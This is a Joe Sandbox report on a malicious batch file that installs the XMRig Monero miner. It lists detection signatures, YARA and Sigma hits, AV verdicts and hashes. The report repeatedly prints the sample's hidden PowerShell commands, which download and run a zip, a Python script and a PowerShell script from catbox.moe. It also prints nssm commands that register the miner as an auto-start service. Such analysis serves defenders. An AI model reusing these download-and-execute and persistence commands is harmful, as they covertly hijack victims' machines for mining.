Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2zirzlMVqX.bat

Overview

General Information

Sample name:2zirzlMVqX.bat
renamed because original name is a hash value
Original sample name:6ef6ab582b21c376ef719396f9fe2205.bat
Analysis ID:1569814
MD5:6ef6ab582b21c376ef719396f9fe2205
SHA1:dc0dffecbe4bd556e5fa977464b2d16a3557ccc6
SHA256:2401c15ca787d7143719e3e28c06d54034fad38352138ce48c082fb79d5859be
Tags:batuser-abuse_ch
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Changes security center settings (notifications, updates, antivirus, firewall)
Found strings related to Crypto-Mining
Machine Learning detection for dropped file
Powershell drops PE file
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Suspicious Invoke-WebRequest Execution
Suspicious powershell command line found
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to delete services
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to launch a program with higher privileges
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • svchost.exe (PID: 2940 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cmd.exe (PID: 4092 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\2zirzlMVqX.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2724 cmdline: powershell.exe "cd $env:TEMP; Start-Process powershell -ArgumentList '-WindowStyle hidden cd $env:TEMP; Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/d6pvcr.zip -OutFile fun.zip; Add-Type -Assembly System.IO.Compression.Filesystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(''""fun.zip''"",''"".''""); (Invoke-WebRequest https://files.catbox.moe/gw2gji.py -UseBasicParsing).Content | ./pyops/python.exe - ;'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7096 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden cd $env:TEMP; Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/d6pvcr.zip -OutFile fun.zip; Add-Type -Assembly System.IO.Compression.Filesystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('"fun.zip','.'); (Invoke-WebRequest https://files.catbox.moe/gw2gji.py -UseBasicParsing).Content | ./pyops/python.exe - ; MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7196 cmdline: powershell.exe "cd $env:TEMP; Start-Process powershell -verb runas -ArgumentList '-WindowStyle hidden Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/ei5hyq.ps1 -OutFile funny.tmp -UseBasicParsing; Get-Content -Raw funny.tmp | powershell.exe - ;'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7292 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/ei5hyq.ps1 -OutFile funny.tmp -UseBasicParsing; Get-Content -Raw funny.tmp | powershell.exe - ; MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" - MD5: 04029E121A0CFA5991749937DD22A1D9)
          • nssm.exe (PID: 8132 cmdline: "C:\ProgramData\.logstxt\nssm.exe" install xmrig C:\ProgramData\.logstxt\xmrig.exe MD5: BECEAE2FDC4F7729A93E94AC2CCD78CC)
          • nssm.exe (PID: 8156 cmdline: "C:\ProgramData\.logstxt\nssm.exe" set xmrig AppDirectory C:\ProgramData\.logstxt MD5: BECEAE2FDC4F7729A93E94AC2CCD78CC)
          • nssm.exe (PID: 8176 cmdline: "C:\ProgramData\.logstxt\nssm.exe" set xmrig AppParameters "xmrig.exe -B -c config.json" MD5: BECEAE2FDC4F7729A93E94AC2CCD78CC)
          • nssm.exe (PID: 5900 cmdline: "C:\ProgramData\.logstxt\nssm.exe" start xmrig MD5: BECEAE2FDC4F7729A93E94AC2CCD78CC)
          • nssm.exe (PID: 3664 cmdline: "C:\ProgramData\.logstxt\nssm.exe" set xmrig start SERVICE_AUTO_START MD5: BECEAE2FDC4F7729A93E94AC2CCD78CC)
          • nssm.exe (PID: 4324 cmdline: "C:\ProgramData\.logstxt\nssm.exe" set xmrig AppNoConsole 1 MD5: BECEAE2FDC4F7729A93E94AC2CCD78CC)
          • nssm.exe (PID: 7408 cmdline: "C:\ProgramData\.logstxt\nssm.exe" set xmrig Type SERVICE_WIN32_OWN_PROCESS MD5: BECEAE2FDC4F7729A93E94AC2CCD78CC)
  • SgrmBroker.exe (PID: 6492 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 5896 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6948 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 4504 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 7920 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 7928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7012 cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • nssm.exe (PID: 2080 cmdline: C:\ProgramData\.logstxt\nssm.exe MD5: BECEAE2FDC4F7729A93E94AC2CCD78CC)
    • conhost.exe (PID: 2268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • xmrig.exe (PID: 2724 cmdline: "C:\ProgramData\.logstxt\xmrig.exe" xmrig.exe -B -c config.json MD5: C0F8959614AE06561216158D78A787E5)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\funny.tmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      C:\Users\user\AppData\Local\Temp\xmrig.exeJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        C:\Users\user\AppData\Local\Temp\xmrig.exeMacOS_Cryptominer_Xmrig_241780a1unknownunknown
        • 0x57aa18:$a1: mining.set_target
        • 0x5754e0:$a2: XMRIG_HOSTNAME
        • 0x5775c0:$a3: Usage: xmrig [OPTIONS]
        • 0x5754b8:$a4: XMRIG_VERSION
        C:\Users\user\AppData\Local\Temp\xmrig.exeMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
        • 0x581418:$x1: donate.ssl.xmrig.com
        • 0x5819c1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
        C:\Users\user\AppData\Local\Temp\xmrig.exeMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
        • 0x581f08:$s1: %s/%s (Windows NT %lu.%lu
        • 0x582f60:$s3: \\.\WinRing0_
        • 0x5797b8:$s4: pool_wallet
        • 0x574d28:$s5: cryptonight
        • 0x574d38:$s5: cryptonight
        • 0x574d48:$s5: cryptonight
        • 0x574d58:$s5: cryptonight
        • 0x574d70:$s5: cryptonight
        • 0x574d80:$s5: cryptonight
        • 0x574d90:$s5: cryptonight
        • 0x574da8:$s5: cryptonight
        • 0x574db8:$s5: cryptonight
        • 0x574dd0:$s5: cryptonight
        • 0x574de8:$s5: cryptonight
        • 0x574df8:$s5: cryptonight
        • 0x574e08:$s5: cryptonight
        • 0x574e18:$s5: cryptonight
        • 0x574e30:$s5: cryptonight
        • 0x574e48:$s5: cryptonight
        • 0x574e58:$s5: cryptonight
        • 0x574e68:$s5: cryptonight
        Click to see the 2 entries
        SourceRuleDescriptionAuthorStrings
        0000000D.00000002.2400933097.0000025E8162F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          0000000D.00000002.2400933097.0000025E819D9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            00000019.00000000.2141475545.00007FF656963000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              00000019.00000002.3755773342.00000214C084C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                0000000D.00000002.2400933097.0000025E8199E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                  Click to see the 20 entries
                  SourceRuleDescriptionAuthorStrings
                  25.0.xmrig.exe.7ff6560c0000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                    25.0.xmrig.exe.7ff6560c0000.0.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
                    • 0x57aa18:$a1: mining.set_target
                    • 0x5754e0:$a2: XMRIG_HOSTNAME
                    • 0x5775c0:$a3: Usage: xmrig [OPTIONS]
                    • 0x5754b8:$a4: XMRIG_VERSION
                    25.0.xmrig.exe.7ff6560c0000.0.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
                    • 0x581418:$x1: donate.ssl.xmrig.com
                    • 0x5819c1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
                    25.0.xmrig.exe.7ff6560c0000.0.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
                    • 0x581f08:$s1: %s/%s (Windows NT %lu.%lu
                    • 0x582f60:$s3: \\.\WinRing0_
                    • 0x5797b8:$s4: pool_wallet
                    • 0x574d28:$s5: cryptonight
                    • 0x574d38:$s5: cryptonight
                    • 0x574d48:$s5: cryptonight
                    • 0x574d58:$s5: cryptonight
                    • 0x574d70:$s5: cryptonight
                    • 0x574d80:$s5: cryptonight
                    • 0x574d90:$s5: cryptonight
                    • 0x574da8:$s5: cryptonight
                    • 0x574db8:$s5: cryptonight
                    • 0x574dd0:$s5: cryptonight
                    • 0x574de8:$s5: cryptonight
                    • 0x574df8:$s5: cryptonight
                    • 0x574e08:$s5: cryptonight
                    • 0x574e18:$s5: cryptonight
                    • 0x574e30:$s5: cryptonight
                    • 0x574e48:$s5: cryptonight
                    • 0x574e58:$s5: cryptonight
                    • 0x574e68:$s5: cryptonight

                    System Summary

                    barindex
                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden cd $env:TEMP; Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/d6pvcr.zip -OutFile fun.zip; Add-Type -Assembly System.IO.Compression.Filesystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('"fun.zip','.'); (Invoke-WebRequest https://files.catbox.moe/gw2gji.py -UseBasicParsing).Content | ./pyops/python.exe - ; , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden cd $env:TEMP; Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/d6pvcr.zip -OutFile fun.zip; Add-Type -Assembly System.IO.Compression.Filesystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('"fun.zip','.'); (Invoke-WebRequest https://files.catbox.moe/gw2gji.py -UseBasicParsing).Content | ./pyops/python.exe - ; , CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: powershell.exe "cd $env:TEMP; Start-Process powershell -ArgumentList '-WindowStyle hidden cd $env:TEMP; Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/d6pvcr.zip -OutFile fun.zip; Add-Type -Assembly System.IO.Compression.Filesystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(''""fun.zip''"",''"".''""); (Invoke-WebRequest https://files.catbox.moe/gw2gji.py -UseBasicParsing).Content | ./pyops/python.exe - ;'", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2724, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden cd $env:TEMP; Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/d6pvcr.zip -OutFile fun.zip; Add-Type -Assembly System.IO.Compression.Filesystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('"fun.zip','.'); (Invoke-WebRequest https://files.catbox.moe/gw2gji.py -UseBasicParsing).Content | ./pyops/python.exe - ; , ProcessId: 7096, ProcessName: powershell.exe
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7504, TargetFilename: C:\Users\user\AppData\Local\Temp\WinRing0x64.sys
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe "cd $env:TEMP; Start-Process powershell -ArgumentList '-WindowStyle hidden cd $env:TEMP; Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/d6pvcr.zip -OutFile fun.zip; Add-Type -Assembly System.IO.Compression.Filesystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(''""fun.zip''"",''"".''""); (Invoke-WebRequest https://files.catbox.moe/gw2gji.py -UseBasicParsing).Content | ./pyops/python.exe - ;'", CommandLine: powershell.exe "cd $env:TEMP; Start-Process powershell -ArgumentList '-WindowStyle hidden cd $env:TEMP; Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/d6pvcr.zip -OutFile fun.zip; Add-Type -Assembly System.IO.Compression.Filesystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(''""fun.zip''"",''"".''""); (Invoke-WebRequest https://files.catbox.moe/gw2gji.py -UseBasicParsing).Content | ./pyops/python.exe - ;'", CommandLine|base64offset|contains: J, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\2zirzlMVqX.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4092, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe "cd $env:TEMP; Start-Process powershell -ArgumentList '-WindowStyle hidden cd $env:TEMP; Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/d6pvcr.zip -OutFile fun.zip; Add-Type -Assembly System.IO.Compression.Filesystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(''""fun.zip''"",''"".''""); (Invoke-WebRequest https://files.catbox.moe/gw2gji.py -UseBasicParsing).Content | ./pyops/python.exe - ;'", ProcessId: 2724, ProcessName: powershell.exe
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell.exe "cd $env:TEMP; Start-Process powershell -ArgumentList '-WindowStyle hidden cd $env:TEMP; Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/d6pvcr.zip -OutFile fun.zip; Add-Type -Assembly System.IO.Compression.Filesystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(''""fun.zip''"",''"".''""); (Invoke-WebRequest https://files.catbox.moe/gw2gji.py -UseBasicParsing).Content | ./pyops/python.exe - ;'", CommandLine: powershell.exe "cd $env:TEMP; Start-Process powershell -ArgumentList '-WindowStyle hidden cd $env:TEMP; Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/d6pvcr.zip -OutFile fun.zip; Add-Type -Assembly System.IO.Compression.Filesystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(''""fun.zip''"",''"".''""); (Invoke-WebRequest https://files.catbox.moe/gw2gji.py -UseBasicParsing).Content | ./pyops/python.exe - ;'", CommandLine|base64offset|contains: J, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\2zirzlMVqX.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4092, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe "cd $env:TEMP; Start-Process powershell -ArgumentList '-WindowStyle hidden cd $env:TEMP; Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/d6pvcr.zip -OutFile fun.zip; Add-Type -Assembly System.IO.Compression.Filesystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(''""fun.zip''"",''"".''""); (Invoke-WebRequest https://files.catbox.moe/gw2gji.py -UseBasicParsing).Content | ./pyops/python.exe - ;'", ProcessId: 2724, ProcessName: powershell.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe "cd $env:TEMP; Start-Process powershell -ArgumentList '-WindowStyle hidden cd $env:TEMP; Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/d6pvcr.zip -OutFile fun.zip; Add-Type -Assembly System.IO.Compression.Filesystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(''""fun.zip''"",''"".''""); (Invoke-WebRequest https://files.catbox.moe/gw2gji.py -UseBasicParsing).Content | ./pyops/python.exe - ;'", CommandLine: powershell.exe "cd $env:TEMP; Start-Process powershell -ArgumentList '-WindowStyle hidden cd $env:TEMP; Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/d6pvcr.zip -OutFile fun.zip; Add-Type -Assembly System.IO.Compression.Filesystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(''""fun.zip''"",''"".''""); (Invoke-WebRequest https://files.catbox.moe/gw2gji.py -UseBasicParsing).Content | ./pyops/python.exe - ;'", CommandLine|base64offset|contains: J, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\2zirzlMVqX.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4092, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe "cd $env:TEMP; Start-Process powershell -ArgumentList '-WindowStyle hidden cd $env:TEMP; Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/d6pvcr.zip -OutFile fun.zip; Add-Type -Assembly System.IO.Compression.Filesystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(''""fun.zip''"",''"".''""); (Invoke-WebRequest https://files.catbox.moe/gw2gji.py -UseBasicParsing).Content | ./pyops/python.exe - ;'", ProcessId: 2724, ProcessName: powershell.exe
                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 2940, ProcessName: svchost.exe
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-06T10:27:00.194562+010028032742Potentially Bad Traffic192.168.2.749831108.181.20.35443TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\xmrig.exeAvira: detection malicious, Label: HEUR/AGEN.1311290
                    Source: C:\ProgramData\.logstxt\xmrig-cuda.dll (copy)ReversingLabs: Detection: 41%
                    Source: C:\ProgramData\.logstxt\xmrig.exe (copy)ReversingLabs: Detection: 83%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 86.5% probability
                    Source: C:\Users\user\AppData\Local\Temp\xmrig.exeJoe Sandbox ML: detected

                    Bitcoin Miner

                    barindex
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: 25.0.xmrig.exe.7ff6560c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.2400933097.0000025E8162F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2400933097.0000025E819D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000000.2141475545.00007FF656963000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.3755773342.00000214C084C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2400933097.0000025E8199E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2400933097.0000025E8040A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000003.2141888155.00000214C089C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2170524020.000001B639A7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2400933097.0000025E8163D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2400933097.0000025E81633000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2400933097.0000025E803B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2170524020.000001B639554000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2400933097.0000025E819B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2400933097.0000025E803B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2170524020.000001B63950A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000000.2141051116.00007FF6564DB000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000003.2141955925.00000214C089C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.3755773342.00000214C087A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2170524020.000001B637FB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2170524020.000001B6382B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7292, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7504, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: xmrig.exe PID: 2724, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\funny.tmp, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\xmrig.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\temp.zip, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\xmrig-cuda.dll, type: DROPPED
                    Source: xmrig.exe, 00000019.00000000.2141051116.00007FF6564DB000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: losestratum+tcp://
                    Source: xmrig.exe, 00000019.00000000.2141051116.00007FF6564DB000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: cryptonight/0
                    Source: xmrig.exe, 00000019.00000000.2141051116.00007FF6564DB000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: losestratum+tcp://
                    Source: xmrig.exe, 00000019.00000000.2141051116.00007FF6564DB000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: -o, --url=URL URL of mining server
                    Source: xmrig.exe, 00000019.00000000.2141051116.00007FF6564DB000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                    Source: powershell.exe, 0000000D.00000002.2400933097.0000025E8162F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: # Create xmrig service file (assuming this has an equivalent in Windows)
                    Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.7:49699 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.7:49701 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.7:49712 version: TLS 1.2
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb; source: powershell.exe, 00000009.00000002.2050378919.00000236FDDE1000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: powershell.exe, 00000009.00000002.1946719482.0000023680F3E000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\Vinay\Projects\simple_launcher\dist\t64.pdb source: powershell.exe, 00000009.00000002.1946719482.0000023680BA2000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: powershell.exe, 00000009.00000002.1946719482.0000023680BA2000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: softy.pdb source: powershell.exe, 00000009.00000002.2048314360.00000236FDD2E000.00000004.00000020.00020000.00000000.sdmp
